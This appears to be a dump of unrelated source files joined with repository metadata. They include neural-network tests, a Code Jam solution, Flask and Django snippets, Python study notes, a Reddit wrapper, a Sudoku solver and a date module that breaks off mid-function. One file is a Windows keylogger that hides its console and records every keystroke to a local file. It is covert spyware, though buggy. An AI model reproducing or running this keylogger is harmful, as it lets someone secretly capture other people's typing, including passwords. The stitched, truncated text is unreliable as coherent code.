net = resunet2(1, 1, spatial=(32,), block=HyperBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBottleneck)
net(th.rand(1, 1, 16))
def testHyp2D(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
def testHyp3D(self):
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBasic)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBasic)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBasic)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBottleneck)
net(th.rand(1, 1, 4, 16, 32))
def testSE1D(self):
net = resunet2(1, 1, spatial=(32,), block=SEBasicBlock)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=SEBasicBlock)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=SEBasicBlock)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), block=SEBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=SEBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=SEBottleneck)
net(th.rand(1, 1, 16))
def testSE2D(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=SEBasicBlock)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=SEBasicBlock)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=SEBasicBlock)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=SEBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=SEBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=SEBottleneck)
net(th.rand(1, 1, 32, 16))
def testSE3D(self):
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=SEBasicBlock)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=SEBasicBlock)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=SEBasicBlock)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=SEBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=SEBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=SEBottleneck)
net(th.rand(1, 1, 4, 16, 32))
def testHyp2DGroupNorm(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
def testHyp1D2(self):
net = resunet2(1, 1, spatial=(32,), block=HyperBasic2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBasic2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBasic2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), block=HyperBottleneck2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBottleneck2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBottleneck2)
net(th.rand(1, 1, 16))
def testHyp2D2(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBasic2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBasic2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBasic2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBottleneck2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBottleneck2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBottleneck2)
net(th.rand(1, 1, 32, 16))
def testHyp3D2(self):
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBasic2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBasic2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBasic2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBottleneck2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBottleneck2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBottleneck2)
net(th.rand(1, 1, 4, 16, 32))
| [
"[email protected]"
] | |
1818810ee229cd68db13a66efefecbe5872edcc2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_35/216.py | d0006fc021592ec292be67dc3cf4606ceec3d5d5 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,591 | py | import string
class GraphNode(object):
def __init__(self, x_pos, y_pos):
self.x_pos = x_pos
self.y_pos = y_pos
self.flows_to = None
self.flows_from = []
self.label = None
def set_flows_to(self, other):
assert self.flows_to != other
self.flows_to = other
other.flows_from.append(self)
def label_node(node, label):
if node.label is None:
node.label = label
if node.flows_to:
label_node(node.flows_to, label)
for from_node in node.flows_from:
label_node(from_node, label)
else:
if node.label != label:
print "Relabeling of node"
adsafa
def label_nodes(h, w, node_map):
current_label = 0
for i in xrange(h):
for j in xrange(w):
label = string.lowercase[current_label]
node = node_map[i][j]
if node.label is None:
label_node(node, label)
current_label += 1
def flow_water(w,h, height_map, node_map):
for i in xrange(h):
for j in xrange(w):
lowest = height_map[i][j]
flow_to = None
if i - 1 >= 0:
if height_map[i-1][j] < lowest:
lowest = height_map[i-1][j]
flow_to = node_map[i-1][j]
if j - 1 >= 0:
if height_map[i][j-1] < lowest:
lowest = height_map[i][j-1]
flow_to = node_map[i][j-1]
if j + 1 < w:
if height_map[i][j+1] < lowest:
lowest = height_map[i][j+1]
flow_to = node_map[i][j+1]
if i + 1 < h:
if height_map[i+1][j] < lowest:
lowest = height_map[i+1][j]
flow_to = node_map[i+1][j]
if flow_to is not None:
node_map[i][j].set_flows_to(flow_to)
def main():
number_of_cases = int(raw_input())
for case_number in range(1, number_of_cases+1):
h,w = map(int, raw_input().split())
print 'Case #%d:' % (case_number,)
height_map = []
node_map = []
for i in xrange(h):
height_map.append(raw_input().split())
line = []
for j in xrange(w):
line.append(GraphNode(i,j))
node_map.append(line)
flow_water(w, h, height_map, node_map)
label_nodes(h, w, node_map)
for node_line in node_map:
for node in node_line:
print node.label,
print
main()
#w, h = 3,3
#height_map = []
#node_map = []
#height_map.append([9,6,3])
#height_map.append([5,9,6])
#height_map.append([3,5,9])
#for i in xrange(h):
#line = []
#for j in xrange(w):
#line.append(GraphNode(i,j))
#node_map.append(line)
#flow_water(w, h, height_map, node_map)
#label_nodes(h, w, node_map)
#for node_line in node_map:
#for node in node_line:
#print node.label,
#print
##if node.flows_to:
##print node.x_pos, node.y_pos, node.flows_to.x_pos, node.flows_to.y_pos, node.label
##else:
##print node.x_pos, node.y_pos, -1, -1, node.label | [
"[email protected]"
] | |
3d63d331134d18797d42e9881c410a0bb654d458 | 5f560350d45fb37aa5346ec746d05e7a9cecf583 | /sentiment_analysis_try1.py | 3d5472c9b5f8758f4ab3131c7048d96ec3e19926 | [] | no_license | nana55star/data-science-project-10-master | cb792ea47f8163b56373ab4d5667083fe715ee80 | 08b2fbe6b5829a2857928313accb02db0cebb1fb | refs/heads/master | 2022-11-19T03:15:24.597663 | 2020-07-20T02:25:17 | 2020-07-20T02:25:17 | 280,975,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from flask import Flask, request
import requests
from flask import jsonify
# Initialize flask application
app=Flask(__name__)
payload = {'count':1000, 'sort_order': 'ascending' }
result= requests.get("http://127.0.0.1:3000/get_data", payload, headers={'Content-Type': 'application/json'})
result_q = result.json()
text=[]
labels=[]
for i in range(len(result_q)):
text.append(result_q[i][0])
labels.append(result_q[i][1])
print("first text with id=1: " + str(text[0]) )
print("first label of the first text: " + str(labels[0]) )
# vectorizer
import pickle
# rb
with open('model.pickle', 'rb') as file:
model = pickle.load(file)
#
with open('vectorizer.pickle', 'rb') as file:
vectorizer = pickle.load(file)
import re
def clean_text(text):
text = text.lower()
text = re.sub("@[a-z0-9_]+", ' ', text)
text = re.sub("[^ ]+\.[^ ]+", ' ', text)
text = re.sub("[^ ]+@[^ ]+\.[^ ]", ' ', text)
text = re.sub("[^a-z\' ]", ' ', text)
text = re.sub(' +', ' ', text)
return text
result_dict = {0: 'negative', 1: 'positive'}
def get_sentiment(text):
try:
text = clean_text(text)
vector = vectorizer.transform([text])
result = model.predict(vector)
return result[0]
except:
return "ERROR"
texts2=[]
for i in range(len(result_q)):
sentiment = get_sentiment(result_q[i][0])
texts2.append(sentiment)
print("First text after being cleaned and transformed to numbers of labels with id=1: " + str(texts2[0]))
payload_1 = {'label_name':'positive', 'count': 1000 }
result_1= requests.get("http://127.0.0.1:3000/get_data_count", payload_1, headers={'Content-Type': 'application/json'})
payload_2 = {'label_name':'negative', 'count': 1000 }
result_2= requests.get("http://127.0.0.1:3000/get_data_count", payload_2, headers={'Content-Type': 'application/json'})
def accuracy(x_test,y_test):
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(x_test,y_test)
return print("The accuracy is " + str(accuracy) )
accuracy(labels, texts2)
| [
"[email protected]"
] | |
28e8240ad2da071ca6374a24427c0cf04bf1df66 | 9cfc5ab90362545c38def5c33f2d6bcdc11d65ab | /blog/views.py | 2dfa65dadb84e7084340b0361bd1c79219bc714f | [] | no_license | salehmmasri/django-crud | 377c4d30987425e9d4b8b83cdba41faf036d1c88 | 2de04f36ad612191dd3bbd1f23107af9feadd1ed | refs/heads/master | 2022-12-21T05:09:24.798958 | 2020-09-22T17:33:22 | 2020-09-22T17:33:22 | 297,630,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | from django.shortcuts import render
from django.views.generic import CreateView, UpdateView, DeleteView,TemplateView, ListView, DetailView
from .models import Post
from django.urls import reverse_lazy, reverse
# # Create your views here.
class PostView(ListView):
template_name = 'home.html'
model=Post
class PostDetailsViewsp(DetailView):
template_name = 'detail.html'
model = Post
class BlogCreateView(CreateView):
template_name = 'blog_create.html'
model = Post
fields = ['title', 'author', 'body']
class BlogUpdateView(UpdateView):
template_name = 'blog_update.html'
model = Post
fields = ['title', 'author', 'body']
class BlogDeleteView(DeleteView):
template_name = 'blog_delete.html'
model = Post
success_url = reverse_lazy('home')
| [
"[email protected]"
] | |
2c84113914b63d511640aec8c07688f75660e985 | 705458c0781ebd7c13776ebf7d690eaf929a8880 | /day27_20191218/2,类的内置方法.py | 76665ae8c02b6bb29ca6ca2f3e4eb2793b9301a0 | [] | no_license | langlangago/learn_python | 8f2298251ad0c07e8efa298d409cdbe77f60bc1b | 29ca4ce4a0628e9b168b9e314acfe5889eb5fc6a | refs/heads/master | 2020-05-16T15:35:15.212613 | 2020-04-16T03:34:43 | 2020-04-16T03:34:43 | 183,135,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,756 | py | # encoding:utf-8
# __str__, __repr__ 用于解释说明,看起来好懂一点
# str() 转换成字符串 ,== __str__
# repr() 原形毕露,原形显示,== __repr__
# print(1, '1')
# print(repr(1), repr('1'))
# class Teacher:
# def __init__(self,name, age):
# self.name = name
# self.age = age
# def __str__(self):
# return 'This is a Teacher object:%s' % self.__dict__
# def __repr__(self):
# return str(self.__dict__)
#
# alex = Teacher('alex', 22)
# print(alex) # print一个对象的时候,就是调用a.__str__方法
# # 如果类没有自己的__str__方法,就调用父类(object)的__str__方法
# print(repr(alex))
# object里有一个__str__方法,一旦被调用就返回这个方法的内存地址
# l = [1, 2, 3, 4] # l 是list类的一个对象,list类里重新实现了__str__方法,让print后看起来好看一点。
# print(l)
# %s str() print 实际上走的都是__str__
# %r repr() 实际上都是走的__repr__
# __str__没有的时候,可以使用__repr__; __repr__没有的时候,不能使用__str__,就只能使用父类的__repr__
# print(obj), str(), %s 的时候,实际上都是调用了内部的__str__方法,那么他返回的必定是一个字符串;
# 如果自己类中没有__str__方法,会先找自己类中的__repr__替代,如没有__repr__方法,就只能使用父类object的__str__
# repr(),%r 会找__repr__,如果没有,直接找父类的。
# __len__ --> len()
#内置方法有很多,不一定都在object里
#比如,不是所有的对象都能求长度len,所以可以自己实现自己的len
# class Classes:
# def __init__(self, name, student):
# self.name = name
# self.student = []
# def __len__(self):
# return len(self.student)
# def __str__(self):
# return 'classes'
# py_s9 = Classes('python全栈9期', [])
# py_s9.student.append('alex')
# py_s9.student.append('tom')
# print(len(py_s9))
# print(py_s9)
# __del__
# 析构函数,再删除一个对象之前进行一些收尾工作
# class A:
# def __del__(self, f):
# self.f.close()
# a = A()
# a.f = open() # 打开文件 1、 在操作系统中打开了一个文件,2、拿到了文件句柄并放入内存
# del a # 拿到文件句柄,既执行了方法(关闭了文件),又删除了文件句柄
# __call__ ,--> () 相当于调用__call__内置方法
class A:
def __init__(self,name):
self.name = name
def __call__(self):
'''
打印这个对象中的所有属性
:return:
'''
for k in self.__dict__:
print(k,self.__dict__[k])
a = A('alex')() # 可调用,()相当于执行 __call__内置方法
| [
"[email protected]"
] | |
2fc0eb1ac5dcc2492d8e658d9c76edbee562ba75 | f909758f99f6ab9f150262cd65bc15bbb82e11c4 | /sources/reddit_api_wrapper.py | 16474a397ffab244a9f1845fbfd9e578e3fae775 | [] | no_license | igsi/R2D2 | b05af200c31e596501464f99a60a95516d9ed4fe | c663babff858a17692bd017969e6e48ccb7ad139 | refs/heads/master | 2021-01-22T23:15:57.357311 | 2017-03-24T07:46:53 | 2017-03-24T07:46:53 | 85,620,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | import praw
from r2d2_errors import R2D2_RedditError
class RedditWrapper:
def __init__(self, configuration, subreddits):
try:
self.reddit = praw.Reddit(client_id = configuration["client_id"],
client_secret = configuration["client_secret"],
user_agent = configuration["user_agent"])
# Parse the list of subreddits read from the config.
multiple_subreddits=subreddits[0]
for subreddit in subreddits[1:]:
multiple_subreddits = multiple_subreddits + "+" + subreddit
self.subreddits = self.reddit.subreddit(multiple_subreddits)
except Exception as e:
raise R2D2_RedditError(e.message)
def getSubmissionsStream(self):
return RedditWrapper.itemsStream(self.subreddits.stream.submissions,
RedditWrapper.submissionToDict)
def getCommentsStream(self):
return RedditWrapper.itemsStream(self.subreddits.stream.comments,
RedditWrapper.commentToDict)
@staticmethod
def itemsStream(itemsGenerator, normalizeItem):
def stream():
i = 1
for item in itemsGenerator():
if (i <= 100):
# First 100 items are historical.
# We discard them because we only want items starting from "now"
i += 1
else:
yield normalizeItem(item)
return stream
@staticmethod
def submissionToDict(submission):
"""Normalize the submissions into a simple dictionary format."""
return RedditWrapper.createItem(submission.id,
"SUBMISSION",
submission.title,
submission.created_utc,
str(submission.subreddit))
@staticmethod
def commentToDict(comment):
"""Normalize the comments into a simple dictionary format."""
return RedditWrapper.createItem(comment.id,
"COMMENT",
comment.body,
comment.created_utc,
str(comment.subreddit))
@staticmethod
def createItem(id, type, content, timestamp, subreddit):
"""Normalize DB items into a dictionary."""
return {RedditWrapper.id_field: id,
RedditWrapper.type_field: type,
RedditWrapper.content_field: content,
RedditWrapper.timestamp_field: timestamp,
RedditWrapper.subreddit_field: subreddit}
# The names of the fields in the dictionary used to represent items
# retrieved from the DB
id_field = "reddit_id"
type_field = "type"
content_field = "content"
timestamp_field = "timestamp"
subreddit_field = "subreddit" | [
"[email protected]"
] | |
0c31c2c12ba0cee2fca07eaa29b494befb80343a | 1626e16760c9c5b5dc9bd7c345871c716d5ffd99 | /Problems/0001_0099/0037_Sudoku_Solver/Project_Python3/Solution1.py | 55219e728189a2d7038f6a589b53cbfbcce69186 | [] | no_license | NobuyukiInoue/LeetCode | 94ddb19e63cb8d0775cdc13f311fe90c87a1d718 | 3f0ffd519404165fd1a735441b212c801fd1ad1e | refs/heads/master | 2023-09-01T07:38:50.939942 | 2023-08-23T09:51:17 | 2023-08-23T09:51:17 | 158,100,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,391 | py | class Solution:
# def solveSudoku(self, board: List[List[str]]) -> None:
def solveSudoku(self, board):
"""
Do not return anything, modify board in-place instead.
"""
from collections import defaultdict
nums = [str(i) for i in range(1, 10)]
rows, cols, cells, empty = defaultdict(set), defaultdict(set), defaultdict(set), set()
for i in range(9):
for j in range(9):
if board[i][j] == '.':
empty.add((i, j))
else:
rows[i].add(board[i][j])
cols[j].add(board[i][j])
cells[i//3, j//3].add(board[i][j])
def fill():
i, j = max(empty, key=lambda x: len(rows[x[0]]) + len(cols[x[1]]) + len(cells[x[0]//3, x[1]//3]))
empty.remove((i, j))
for num in nums:
if not (num in rows[i] or num in cols[j] or num in cells[i//3, j//3]):
board[i][j] = num; rows[i].add(num); cols[j].add(num); cells[i//3, j//3].add(num)
if not empty: return True
if fill(): return True
board[i][j] = '.'; rows[i].remove(num); cols[j].remove(num); cells[i//3, j//3].remove(num)
empty.add((i, j))
return False
if not empty: return
_ = fill()
| [
"[email protected]"
] | |
f10f571988378799ac15273d5f05eee049bd9d4b | 34bdcfc5d7c884c6fcc79ab264f14a95d63418ac | /Capitulo7_Socket/Cliente_UDP.py | f9300f10bca0c3cbafcd5882e34c8b7ab5bee383 | [] | no_license | giomovini/nanoCouseFiap_python | a8be74eab47b9c8ec30a8983b13fdd64669f690e | 342f6f60a875f2081ec577b0362bdf97781ded43 | refs/heads/main | 2023-04-04T01:40:02.202390 | 2021-04-13T14:55:04 | 2021-04-13T14:55:04 | 346,827,474 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | from socket import *
servidor = "127.0.0.1"
porta = 43210
obj_socket = socket(AF_INET, SOCK_DGRAM)
obj_socket.connect((servidor, porta))
saida = ""
while saida != "X":
msg = input("Sua mensagem: ")
obj_socket.sendto(msg.encode(), (servidor,porta))
dados, origem = obj_socket.recvfrom(65535)
print("Resposta do Servidor: ", dados.decode())
saida = input("Digite <X> para sair: ").upper()
obj_socket.close()
| [
"[email protected]"
] | |
7c9fa6cda81eafe310ba5a888b58394318b6dabc | de93337b44c8e90461b20bba29baa9866e5fa974 | /keylogger.py | b918e3f82fb295906ef3f12f33d24fe7c69c7be4 | [] | no_license | felipefbelo/Infosec | b5362519142e3810d942f59a6b9337985fbcf9fc | f272b613ad066c558ae7dbc9c0bfb904818d151b | refs/heads/master | 2022-02-24T03:43:14.950956 | 2022-02-14T23:54:26 | 2022-02-14T23:54:26 | 180,662,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python
import win32console
import win32gui
import pythoncom
import pyHook
# Keylogger em fase de testes...
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
f=open('C:\Users\fbelo\Downloads\output.txt','r+')
buffer=f.read()
f.close()
f=open('C:\Users\fbelo\Downloads\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
f1 = open('C:\Users\fbelo\Downloads\output.txt', 'w')
f1.write('Incoming keys:\n')
f1.close()
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages() | [
"[email protected]"
] | |
f4d93c91da7d8510d5fdbdc9854b1470747f5ebf | 19b9bc401df28ede4b4a5f6fa00ee17042299719 | /archive/To02-01/01-30/jingu_01-30.py | 41fe494a1558fad298323d28a96511a96d845074 | [] | no_license | kibitzing/FluentPython | fb0c21c164e0bf7a543e8c3c0d92c6f6c303ebb6 | 75c743ce4c5e65c2d891babd23f0e4b873924000 | refs/heads/master | 2021-07-10T23:42:58.224235 | 2019-02-12T14:24:06 | 2019-02-12T14:24:06 | 147,219,835 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,976 | py | # p642~p646
# created by Jingu Kang on 01-29
# reference: Fluent Python by Luciano Ramalho
# more abstract python.
def cls_name(obj_or_cls):
cls = type(obj_or_cls)
if cls is type:
cls = obj_or_cls
return cls.__name__.split('.')[-1]
def display(obj):
cls = type(obj)
if cls is type:
return '<class {}>'.format(obj.__name__)
elif cls in [type(None), int]:
return repr(obj)
else:
return '<{} object>'.format(cls_name(obj))
def print_args(name, *args):
pseudo_args = ', '.join(display(x) for x in args)
print('-> {}.__{}__({})'.format(cls_name(args[0]), name, pseudo_args))
## essential classes for this example
class Overriding:
"""a.k.a data descriptor or enforced descriptor"""
def __get__(self, instance, owner):
print_args('get', self, instance, owner)
def __set__(self, instance, value):
print_args('set', self, instance, value)
class overridingNoGet:
"""an overriding descriptor without __get__"""
def __set__(self, instance, value):
print_args('set', self, instance, value)
class NonOverriding:
"""a.k.a. non-data or shadowable descriptor"""
def __get__(self, instance, owner):
print_args('get', self, instance, owner)
class Managed:
over = Overriding()
over_no_get = overridingNoGet()
non_over = NonOverriding()
def spam(self):
print('-> managed.spam({})'.format(display(self)))
obj = Managed()
obj.over
Managed.over
print(vars(obj))
obj.over = 8
obj.over
Managed.over
obj.__dict__['over'] = 8
print(vars(obj))
print(obj.over_no_get)
print(Managed.over_no_get)
obj.over_no_get = 9
print(obj.over_no_get)
obj.__dict__['over_no_get'] = 9
print(obj.over_no_get)
obj.over_no_get = 99
print(obj.over_no_get) # not gonna be changed to 99
obj.__dict__['over_no_get'] = 99
print(obj.over_no_get) # changed to 99
| [
"[email protected]"
] | |
5d4e5cf66dd81c1707202cdf95b789e009a79145 | 466a1b7e182be502aa9a0048f6d6216cd7139970 | /moduleFechas.py | 0da26b56d450256eca26476449c9198e9bafea64 | [] | no_license | redtdt/smdh | 168a8babe526dbf4423a588fe9f0286d9802c778 | c83ed5947a01935152b591ca68b8b4e9af2e430d | refs/heads/master | 2020-05-02T02:04:52.334028 | 2012-05-17T15:53:40 | 2012-05-17T15:53:40 | 3,880,045 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,809 | py | #-----------------------------------------------------------------------------
# Name: moduleFechas.py
#
#
# RCS-ID: $Id: moduleFechas.py $
#
# Licence: Sistema de Monitoreo de Derechos Humanos, Compilacion de datos
# Copyright (C) 2010, Asociacion Todos los Derechos para Todos, A.C.
# Registro Publico de Derechos de Autor, Num. de Registro
# 03-2010-101210014200-01, Mexico.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see<http://www.gnu.org/licenses/>.
#
#-----------------------------------------------------------------------------
import calendar
import datetime
def ajustaFecha(tipo, dia, mes, anio, ini, status):
diag = ''
try:
tipo = int(tipo)
except:
tipo = 0
if tipo == status.idSinDia:
dia = 1 if ini else calendar.monthrange(anio, mes)[1]
if tipo == status.idSinMes or tipo == 116:
dia = 1 if ini else 31
mes = 1 if ini else 12
if dia and mes and anio:
fecha = datetime.date(anio, mes, dia)
return fecha
else:
return None
def FechasValidas(tipoI, diaI, mesI, anioI, tipoF, diaF, mesF, anioF, status):
if not tipoI or not tipoF:
return True
# nada que comparar
fechaI = ajustaFecha(tipoI, diaI, mesI, anioI, True, status)
fechaF = ajustaFecha(tipoF, diaF, mesF, anioF, False, status)
if fechaI and fechaF:
if fechaF < fechaI:
#print 'Fechas:', tipoI, fechaI, tipoF, fechaF
return False
return True
else:
return False
def camposFechasValidas(tipoI, fechaI, tipoF, fechaF, status):
return FechasValidas(tipoI, fechaI.day, fechaI.month, fechaI.year, tipoF, fechaF.day, fechaF.month, fechaF.year, status)
def ctrlFechasValidas(ctrlFechaI, tipoI, ctrlFechaF, tipoF, status):
if tipoI:
tipoI=tipoI.id
else:
tipoI=0
if tipoF:
tipoF=tipoF.id
else:
tipoF=0
